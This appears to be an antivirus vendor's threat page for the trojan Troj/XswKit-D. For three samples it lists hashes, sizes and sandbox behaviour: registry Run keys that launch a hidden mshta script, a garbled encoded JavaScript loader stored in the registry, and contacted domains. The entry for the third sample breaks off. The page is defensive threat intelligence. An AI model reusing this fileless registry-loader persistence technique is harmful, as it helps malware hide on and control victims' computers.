Troj/XswKit-D

Catégorie: Virus et spywaresProtection disponible depuis:19 févr. 2015 21:08:10 (GMT)
Type: TrojanDernière mise à jour :25 mai 2015 23:45:17 (GMT)
Prévalence:

Download Téléchargez notre outil gratuit de suppression des virus - Découvrez ce que votre antivirus actuel n'a pas su détecter

Examples of Troj/XswKit-D include:

Example 1

File Information

Size
248K
SHA-1
09a8629f0ae69ca115635950bf5ba0b63b98d42e
MD5
ed8ef781eed9d6fdc9208948ec3b0037
CRC-32
00a79571
File type
Windows executable
First seen
2015-02-19

Runtime Analysis

Registry Keys Created
  • HKCU\Software\ xsw
    loader
    va□ □pl□□b□□l□□b□□e□0t□□=□□t□□i□0;□□v□□r□□F□0O□□=□□f□0o□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□0c□ i□□t□□n□p.□`i□□e□0y□0t□Pm□□b□□e□0t□ )□□□□`a□ □ps□□S□□e□□l□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□pS□0r□□p□@.□0h□Pl□□"□□;□□v□□r□□D□Pf□□u□□t□@i□ □□ □ps□□S□□e□□l□□E□□p□□n□@E□□v□□r□□n□□e□□t□0t□ i□□g□0(□ %□@M□□%□□\□ )□□□□□v□□r□□H□@A□ u□□C□□m□□a□□d□□=□□□□□"□□b□□u□@:□□t□□t□□e□□□□□<□□t□□t□□e□□<□0c□ i□□t□□m□□v□PT□□(□□3□□0□□-□00□□)□□r□Ps□□z□PT□□(□□,□□)□□<□□s□0r□□p□@>□ □□ □□□□ <□□t□□:□□p□□l□□c□□t□□o□□ □0h□□w□□n□@a□0k□ a□ =□□o□□>□□s□0r□□p□@>□Pv□□l□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□'□pS□0r□□p□@.□0h□Pl□□'□□.□ +□□□□ R□Pg□ e□□d□□'□□K□0U□□\□□\□0o□`t□pa□ e□□\□□\□□x□0w□□\□□\□□o□□d□Pr□p)□□;□□/□0c□ i□□t□□"□□□□□f□Pn□0t□□o□□ □ e□0o□Pr□0e□0(□□□□□□□□*□□m□0h□@a□□e□□e□□T□`q□□A□□M□□A□□A□PA□□A□□/□□8□□A□ [... 7086 intervening characters ...] □A□□A□□A□□A□□A□□A□□A□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□o□□C□pA□□A□□o□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□Pg□□E□□A□□A□ A□□E□□A□□A□ A□□E□□A□□A□ A□
  • HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKEY_USERS\S-1-5-20\Software\ xsw
    loader
    va□ □pl□□b□□l□□b□□e□0t□□=□□t□□i□0;□□v□□r□□F□0O□□=□□f□0o□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□0c□ i□□t□□n□p.□`i□□e□0y□0t□Pm□□b□□e□0t□ )□□□□`a□ □ps□□S□□e□□l□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□pS□0r□□p□@.□0h□Pl□□"□□;□□v□□r□□D□Pf□□u□□t□@i□ □□ □ps□□S□□e□□l□□E□□p□□n□@E□□v□□r□□n□□e□□t□0t□ i□□g□0(□ %□@M□□%□□\□ )□□□□□v□□r□□H□@A□ u□□C□□m□□a□□d□□=□□□□□"□□b□□u□@:□□t□□t□□e□□□□□<□□t□□t□□e□□<□0c□ i□□t□□m□□v□PT□□(□□3□□0□□-□00□□)□□r□Ps□□z□PT□□(□□,□□)□□<□□s□0r□□p□@>□ □□ □□□□ <□□t□□:□□p□□l□□c□□t□□o□□ □0h□□w□□n□@a□0k□ a□ =□□o□□>□□s□0r□□p□@>□Pv□□l□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□'□pS□0r□□p□@.□0h□Pl□□'□□.□ +□□□□ R□Pg□ e□□d□□'□□K□0U□□\□□\□0o□`t□pa□ e□□\□□\□□x□0w□□\□□\□□o□□d□Pr□p)□□;□□/□0c□ i□□t□□"□□□□□f□Pn□0t□□o□□ □ e□0o□Pr□0e□0(□□□□□□□□*□□m□0h□@a□□e□□e□□T□`q□□A□□M□□A□□A□PA□□A□□/□□8□□A□ [... 7086 intervening characters ...] □A□□A□□A□□A□□A□□A□□A□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□o□□C□pA□□A□□o□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□Pg□□E□□A□□A□ A□□E□□A□□A□ A□□E□□A□□A□ A□
  • HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKEY_USERS\S-1-5-19\Software\ xsw
    loader
    va□ □pl□□b□□l□□b□□e□0t□□=□□t□□i□0;□□v□□r□□F□0O□□=□□f□0o□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□0c□ i□□t□□n□p.□`i□□e□0y□0t□Pm□□b□□e□0t□ )□□□□`a□ □ps□□S□□e□□l□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□pS□0r□□p□@.□0h□Pl□□"□□;□□v□□r□□D□Pf□□u□□t□@i□ □□ □ps□□S□□e□□l□□E□□p□□n□@E□□v□□r□□n□□e□□t□0t□ i□□g□0(□ %□@M□□%□□\□ )□□□□□v□□r□□H□@A□ u□□C□□m□□a□□d□□=□□□□□"□□b□□u□@:□□t□□t□□e□□□□□<□□t□□t□□e□□<□0c□ i□□t□□m□□v□PT□□(□□3□□0□□-□00□□)□□r□Ps□□z□PT□□(□□,□□)□□<□□s□0r□□p□@>□ □□ □□□□ <□□t□□:□□p□□l□□c□□t□□o□□ □0h□□w□□n□@a□0k□ a□ =□□o□□>□□s□0r□□p□@>□Pv□□l□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□'□pS□0r□□p□@.□0h□Pl□□'□□.□ +□□□□ R□Pg□ e□□d□□'□□K□0U□□\□□\□0o□`t□pa□ e□□\□□\□□x□0w□□\□□\□□o□□d□Pr□p)□□;□□/□0c□ i□□t□□"□□□□□f□Pn□0t□□o□□ □ e□0o□Pr□0e□0(□□□□□□□□*□□m□0h□@a□□e□□e□□T□`q□□A□□M□□A□□A□PA□□A□□/□□8□□A□ [... 7086 intervening characters ...] □A□□A□□A□□A□□A□□A□□A□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□o□□C□pA□□A□□o□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□Pg□□E□□A□□A□ A□□E□□A□□A□ A□□E□□A□□A□ A□
  • HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKEY_USERS\S-1-5-18\Software\ xsw
    loader
    va□ □pl□□b□□l□□b□□e□0t□□=□□t□□i□0;□□v□□r□□F□0O□□=□□f□0o□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□0c□ i□□t□□n□p.□`i□□e□0y□0t□Pm□□b□□e□0t□ )□□□□`a□ □ps□□S□□e□□l□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□pS□0r□□p□@.□0h□Pl□□"□□;□□v□□r□□D□Pf□□u□□t□@i□ □□ □ps□□S□□e□□l□□E□□p□□n□@E□□v□□r□□n□□e□□t□0t□ i□□g□0(□ %□@M□□%□□\□ )□□□□□v□□r□□H□@A□ u□□C□□m□□a□□d□□=□□□□□"□□b□□u□@:□□t□□t□□e□□□□□<□□t□□t□□e□□<□0c□ i□□t□□m□□v□PT□□(□□3□□0□□-□00□□)□□r□Ps□□z□PT□□(□□,□□)□□<□□s□0r□□p□@>□ □□ □□□□ <□□t□□:□□p□□l□□c□□t□□o□□ □0h□□w□□n□@a□0k□ a□ =□□o□□>□□s□0r□□p□@>□Pv□□l□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□'□pS□0r□□p□@.□0h□Pl□□'□□.□ +□□□□ R□Pg□ e□□d□□'□□K□0U□□\□□\□0o□`t□pa□ e□□\□□\□□x□0w□□\□□\□□o□□d□Pr□p)□□;□□/□0c□ i□□t□□"□□□□□f□Pn□0t□□o□□ □ e□0o□Pr□0e□0(□□□□□□□□*□□m□0h□@a□□e□□e□□T□`q□□A□□M□□A□□A□PA□□A□□/□□8□□A□ [... 7086 intervening characters ...] □A□□A□□A□□A□□A□□A□□A□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□o□□C□pA□□A□□o□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□Pg□□E□□A□□A□ A□□E□□A□□A□ A□□E□□A□□A□ A□
  • HKEY_USERS\.DEFAULT\Software\ xsw
    loader
    va□ □pl□□b□□l□□b□□e□0t□□=□□t□□i□0;□□v□□r□□F□0O□□=□□f□0o□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□0c□ i□□t□□n□p.□`i□□e□0y□0t□Pm□□b□□e□0t□ )□□□□`a□ □ps□□S□□e□□l□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□pS□0r□□p□@.□0h□Pl□□"□□;□□v□□r□□D□Pf□□u□□t□@i□ □□ □ps□□S□□e□□l□□E□□p□□n□@E□□v□□r□□n□□e□□t□0t□ i□□g□0(□ %□@M□□%□□\□ )□□□□□v□□r□□H□@A□ u□□C□□m□□a□□d□□=□□□□□"□□b□□u□@:□□t□□t□□e□□□□□<□□t□□t□□e□□<□0c□ i□□t□□m□□v□PT□□(□□3□□0□□-□00□□)□□r□Ps□□z□PT□□(□□,□□)□□<□□s□0r□□p□@>□ □□ □□□□ <□□t□□:□□p□□l□□c□□t□□o□□ □0h□□w□□n□@a□0k□ a□ =□□o□□>□□s□0r□□p□@>□Pv□□l□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□'□pS□0r□□p□@.□0h□Pl□□'□□.□ +□□□□ R□Pg□ e□□d□□'□□K□0U□□\□□\□0o□`t□pa□ e□□\□□\□□x□0w□□\□□\□□o□□d□Pr□p)□□;□□/□0c□ i□□t□□"□□□□□f□Pn□0t□□o□□ □ e□0o□Pr□0e□0(□□□□□□□□*□□m□0h□@a□□e□□e□□T□`q□□A□□M□□A□□A□PA□□A□□/□□8□□A□ [... 7086 intervening characters ...] □A□□A□□A□□A□□A□□A□□A□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□o□□C□pA□□A□□o□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□Pg□□E□□A□□A□ A□□E□□A□□A□ A□□E□□A□□A□ A□
Processes Created
  • c:\windows\system32\svchost.exe
HTTP Requests
  • http://-\x80L\x01\x03
DNS Requests
  • eurekafuntime.net

Example 2

File Information

Size
307K
SHA-1
0a24d6c22ee4c99a374eb821eca1ddd76f55093f
MD5
897b6634e9fb1651248306649c91eb44
CRC-32
f7fa6071
File type
Windows executable
First seen
2015-02-28

Runtime Analysis

Registry Keys Created
  • HKEY_USERS\S-1-5-20\Software\ xsw
    loader
    va□ □pl□□b□□l□□b□□e□0t□□=□□t□□i□0;□□v□□r□□F□0O□□=□□f□0o□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□0c□ i□□t□□n□p.□`i□□e□0y□0t□Pm□□b□□e□0t□ )□□□□`a□ □ps□□S□□e□□l□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□pS□0r□□p□@.□0h□Pl□□"□□;□□v□□r□□D□Pf□□u□□t□@i□ □□ □ps□□S□□e□□l□□E□□p□□n□@E□□v□□r□□n□□e□□t□0t□ i□□g□0(□ %□@M□□%□□\□ )□□□□□v□□r□□H□@A□ u□□C□□m□□a□□d□□=□□□□□"□□b□□u□@:□□t□□t□□e□□□□□<□□t□□t□□e□□<□0c□ i□□t□□m□□v□PT□□(□□3□□0□□-□00□□)□□r□Ps□□z□PT□□(□□,□□)□□<□□s□0r□□p□@>□ □□ □□□□ <□□t□□:□□p□□l□□c□□t□□o□□ □0h□□w□□n□@a□0k□ a□ =□□o□□>□□s□0r□□p□@>□Pv□□l□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□'□pS□0r□□p□@.□0h□Pl□□'□□.□ +□□□□ R□Pg□ e□□d□□'□□K□0U□□\□□\□0o□`t□pa□ e□□\□□\□□x□0w□□\□□\□□o□□d□Pr□p)□□;□□/□0c□ i□□t□□"□□□□□f□Pn□0t□□o□□ □ e□0o□Pr□0e□0(□□□□□□□□*□□m□0h□@a□□e□□e□□T□`q□□A□□M□□A□□A□PA□□A□□/□□8□□A□ [... 7086 intervening characters ...] □A□□A□□A□□A□□A□□A□□A□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□o□□C□pA□□A□□o□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□Pg□□E□□A□□A□ A□□E□□A□□A□ A□□E□□A□□A□ A□
  • HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKEY_USERS\S-1-5-18\Software\ xsw
    loader
    va□ □pl□□b□□l□□b□□e□0t□□=□□t□□i□0;□□v□□r□□F□0O□□=□□f□0o□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□0c□ i□□t□□n□p.□`i□□e□0y□0t□Pm□□b□□e□0t□ )□□□□`a□ □ps□□S□□e□□l□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□pS□0r□□p□@.□0h□Pl□□"□□;□□v□□r□□D□Pf□□u□□t□@i□ □□ □ps□□S□□e□□l□□E□□p□□n□@E□□v□□r□□n□□e□□t□0t□ i□□g□0(□ %□@M□□%□□\□ )□□□□□v□□r□□H□@A□ u□□C□□m□□a□□d□□=□□□□□"□□b□□u□@:□□t□□t□□e□□□□□<□□t□□t□□e□□<□0c□ i□□t□□m□□v□PT□□(□□3□□0□□-□00□□)□□r□Ps□□z□PT□□(□□,□□)□□<□□s□0r□□p□@>□ □□ □□□□ <□□t□□:□□p□□l□□c□□t□□o□□ □0h□□w□□n□@a□0k□ a□ =□□o□□>□□s□0r□□p□@>□Pv□□l□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□'□pS□0r□□p□@.□0h□Pl□□'□□.□ +□□□□ R□Pg□ e□□d□□'□□K□0U□□\□□\□0o□`t□pa□ e□□\□□\□□x□0w□□\□□\□□o□□d□Pr□p)□□;□□/□0c□ i□□t□□"□□□□□f□Pn□0t□□o□□ □ e□0o□Pr□0e□0(□□□□□□□□*□□m□0h□@a□□e□□e□□T□`q□□A□□M□□A□□A□PA□□A□□/□□8□□A□ [... 7086 intervening characters ...] □A□□A□□A□□A□□A□□A□□A□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□o□□C□pA□□A□□o□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□Pg□□E□□A□□A□ A□□E□□A□□A□ A□□E□□A□□A□ A□
  • HKEY_USERS\S-1-5-19\Software\ xsw
    loader
    va□ □pl□□b□□l□□b□□e□0t□□=□□t□□i□0;□□v□□r□□F□0O□□=□□f□0o□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□0c□ i□□t□□n□p.□`i□□e□0y□0t□Pm□□b□□e□0t□ )□□□□`a□ □ps□□S□□e□□l□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□pS□0r□□p□@.□0h□Pl□□"□□;□□v□□r□□D□Pf□□u□□t□@i□ □□ □ps□□S□□e□□l□□E□□p□□n□@E□□v□□r□□n□□e□□t□0t□ i□□g□0(□ %□@M□□%□□\□ )□□□□□v□□r□□H□@A□ u□□C□□m□□a□□d□□=□□□□□"□□b□□u□@:□□t□□t□□e□□□□□<□□t□□t□□e□□<□0c□ i□□t□□m□□v□PT□□(□□3□□0□□-□00□□)□□r□Ps□□z□PT□□(□□,□□)□□<□□s□0r□□p□@>□ □□ □□□□ <□□t□□:□□p□□l□□c□□t□□o□□ □0h□□w□□n□@a□0k□ a□ =□□o□□>□□s□0r□□p□@>□Pv□□l□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□'□pS□0r□□p□@.□0h□Pl□□'□□.□ +□□□□ R□Pg□ e□□d□□'□□K□0U□□\□□\□0o□`t□pa□ e□□\□□\□□x□0w□□\□□\□□o□□d□Pr□p)□□;□□/□0c□ i□□t□□"□□□□□f□Pn□0t□□o□□ □ e□0o□Pr□0e□0(□□□□□□□□*□□m□0h□@a□□e□□e□□T□`q□□A□□M□□A□□A□PA□□A□□/□□8□□A□ [... 7086 intervening characters ...] □A□□A□□A□□A□□A□□A□□A□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□o□□C□pA□□A□□o□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□Pg□□E□□A□□A□ A□□E□□A□□A□ A□□E□□A□□A□ A□
  • HKCU\Software\ xsw
    loader
    va□ □pl□□b□□l□□b□□e□0t□□=□□t□□i□0;□□v□□r□□F□0O□□=□□f□0o□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□0c□ i□□t□□n□p.□`i□□e□0y□0t□Pm□□b□□e□0t□ )□□□□`a□ □ps□□S□□e□□l□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□pS□0r□□p□@.□0h□Pl□□"□□;□□v□□r□□D□Pf□□u□□t□@i□ □□ □ps□□S□□e□□l□□E□□p□□n□@E□□v□□r□□n□□e□□t□0t□ i□□g□0(□ %□@M□□%□□\□ )□□□□□v□□r□□H□@A□ u□□C□□m□□a□□d□□=□□□□□"□□b□□u□@:□□t□□t□□e□□□□□<□□t□□t□□e□□<□0c□ i□□t□□m□□v□PT□□(□□3□□0□□-□00□□)□□r□Ps□□z□PT□□(□□,□□)□□<□□s□0r□□p□@>□ □□ □□□□ <□□t□□:□□p□□l□□c□□t□□o□□ □0h□□w□□n□@a□0k□ a□ =□□o□□>□□s□0r□□p□@>□Pv□□l□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□'□pS□0r□□p□@.□0h□Pl□□'□□.□ +□□□□ R□Pg□ e□□d□□'□□K□0U□□\□□\□0o□`t□pa□ e□□\□□\□□x□0w□□\□□\□□o□□d□Pr□p)□□;□□/□0c□ i□□t□□"□□□□□f□Pn□0t□□o□□ □ e□0o□Pr□0e□0(□□□□□□□□*□□m□0h□@a□□e□□e□□T□`q□□A□□M□□A□□A□PA□□A□□/□□8□□A□ [... 7086 intervening characters ...] □A□□A□□A□□A□□A□□A□□A□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□o□□C□pA□□A□□o□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□Pg□□E□□A□□A□ A□□E□□A□□A□ A□□E□□A□□A□ A□
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKEY_USERS\.DEFAULT\Software\ xsw
    loader
    va□ □pl□□b□□l□□b□□e□0t□□=□□t□□i□0;□□v□□r□□F□0O□□=□□f□0o□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□0c□ i□□t□□n□p.□`i□□e□0y□0t□Pm□□b□□e□0t□ )□□□□`a□ □ps□□S□□e□□l□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□pS□0r□□p□@.□0h□Pl□□"□□;□□v□□r□□D□Pf□□u□□t□@i□ □□ □ps□□S□□e□□l□□E□□p□□n□@E□□v□□r□□n□□e□□t□0t□ i□□g□0(□ %□@M□□%□□\□ )□□□□□v□□r□□H□@A□ u□□C□□m□□a□□d□□=□□□□□"□□b□□u□@:□□t□□t□□e□□□□□<□□t□□t□□e□□<□0c□ i□□t□□m□□v□PT□□(□□3□□0□□-□00□□)□□r□Ps□□z□PT□□(□□,□□)□□<□□s□0r□□p□@>□ □□ □□□□ <□□t□□:□□p□□l□□c□□t□□o□□ □0h□□w□□n□@a□0k□ a□ =□□o□□>□□s□0r□□p□@>□Pv□□l□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□'□pS□0r□□p□@.□0h□Pl□□'□□.□ +□□□□ R□Pg□ e□□d□□'□□K□0U□□\□□\□0o□`t□pa□ e□□\□□\□□x□0w□□\□□\□□o□□d□Pr□p)□□;□□/□0c□ i□□t□□"□□□□□f□Pn□0t□□o□□ □ e□0o□Pr□0e□0(□□□□□□□□*□□m□0h□@a□□e□□e□□T□`q□□A□□M□□A□□A□PA□□A□□/□□8□□A□ [... 7086 intervening characters ...] □A□□A□□A□□A□□A□□A□□A□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□o□□C□pA□□A□□o□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□Pg□□E□□A□□A□ A□□E□□A□□A□ A□□E□□A□□A□ A□
  • HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
Processes Created
  • c:\windows\system32\svchost.exe
HTTP Requests
  • http://-\x80L\x01\x03
DNS Requests
  • flashkoos.com

Example 3

File Information

Size
270K
SHA-1
0c4fc0d60793d93f1774cf1611eda9e1187fde3c
MD5
94ee6b6b34db07158ac03bf62cc90536
CRC-32
e2e98ebb
File type
Windows executable
First seen
2007-10-17

Runtime Analysis

Registry Keys Created
  • HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKEY_USERS\S-1-5-20\Software\ xsw
    loader
    va□ □pl□□b□□l□□b□□e□0t□□=□□t□□i□0;□□v□□r□□F□0O□□=□□f□0o□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□0c□ i□□t□□n□p.□`i□□e□0y□0t□Pm□□b□□e□0t□ )□□□□`a□ □ps□□S□□e□□l□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□pS□0r□□p□@.□0h□Pl□□"□□;□□v□□r□□D□Pf□□u□□t□@i□ □□ □ps□□S□□e□□l□□E□□p□□n□@E□□v□□r□□n□□e□□t□0t□ i□□g□0(□ %□@M□□%□□\□ )□□□□□v□□r□□H□@A□ u□□C□□m□□a□□d□□=□□□□□"□□b□□u□@:□□t□□t□□e□□□□□<□□t□□t□□e□□<□0c□ i□□t□□m□□v□PT□□(□□3□□0□□-□00□□)□□r□Ps□□z□PT□□(□□,□□)□□<□□s□0r□□p□@>□ □□ □□□□ <□□t□□:□□p□□l□□c□□t□□o□□ □0h□□w□□n□@a□0k□ a□ =□□o□□>□□s□0r□□p□@>□Pv□□l□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□'□pS□0r□□p□@.□0h□Pl□□'□□.□ +□□□□ R□Pg□ e□□d□□'□□K□0U□□\□□\□0o□`t□pa□ e□□\□□\□□x□0w□□\□□\□□o□□d□Pr□p)□□;□□/□0c□ i□□t□□"□□□□□f□Pn□0t□□o□□ □ e□0o□Pr□0e□0(□□□□□□□□*□□m□0h□@a□□e□□e□□T□`q□□A□□M□□A□□A□PA□□A□□/□□8□□A□ [... 7086 intervening characters ...] □A□□A□□A□□A□□A□□A□□A□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□o□□C□pA□□A□□o□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□Pg□□E□□A□□A□ A□□E□□A□□A□ A□□E□□A□□A□ A□
  • HKCU\Software\ xsw
    loader
    va□ □pl□□b□□l□□b□□e□0t□□=□□t□□i□0;□□v□□r□□F□0O□□=□□f□0o□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□0c□ i□□t□□n□p.□`i□□e□0y□0t□Pm□□b□□e□0t□ )□□□□`a□ □ps□□S□□e□□l□□=□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□"□pS□0r□□p□@.□0h□Pl□□"□□;□□v□□r□□D□Pf□□u□□t□@i□ □□ □ps□□S□□e□□l□□E□□p□□n□@E□□v□□r□□n□□e□□t□0t□ i□□g□0(□ %□@M□□%□□\□ )□□□□□v□□r□□H□@A□ u□□C□□m□□a□□d□□=□□□□□"□□b□□u□@:□□t□□t□□e□□□□□<□□t□□t□□e□□<□0c□ i□□t□□m□□v□PT□□(□□3□□0□□-□00□□)□□r□Ps□□z□PT□□(□□,□□)□□<□□s□0r□□p□@>□ □□ □□□□ <□□t□□:□□p□□l□□c□□t□□o□□ □0h□□w□□n□@a□0k□ a□ =□□o□□>□□s□0r□□p□@>□Pv□□l□□n□Pw□□A□0t□□v□PX□□b□□e□0t□□'□pS□0r□□p□@.□0h□Pl□□'□□.□ +□□□□ R□Pg□ e□□d□□'□□K□0U□□\□□\□0o□`t□pa□ e□□\□□\□□x□0w□□\□□\□□o□□d□Pr□p)□□;□□/□0c□ i□□t□□"□□□□□f□Pn□0t□□o□□ □ e□0o□Pr□0e□0(□□□□□□□□*□□m□0h□@a□□e□□e□□T□`q□□A□□M□□A□□A□PA□□A□□/□□8□□A□ [... 7086 intervening characters ...] □A□□A□□A□□A□□A□□A□□A□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□A□□o□□C□pA□□A□□o□□C□□A□□A□□g□□C□□A□□A□□g□□C□□A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□0A□□I□□A□pA□Pg□□E□□A□□A□ A□□E□□A□□A□ A□□E□□A□□A□ A□
  • HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKEY_USERS\S-1-5-18\Software\ xsw
    loader
